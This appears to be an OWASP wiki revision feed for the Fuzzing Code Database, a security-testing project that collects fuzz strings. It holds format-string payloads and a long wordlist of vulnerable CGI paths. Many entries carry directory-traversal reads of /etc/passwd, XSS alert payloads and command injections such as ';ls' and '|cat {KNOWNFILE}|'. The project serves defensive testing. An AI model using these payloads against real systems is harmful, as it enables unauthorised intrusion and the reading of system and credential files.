%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80092</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80092"/>
				<updated>2010-03-17T23:15:02Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
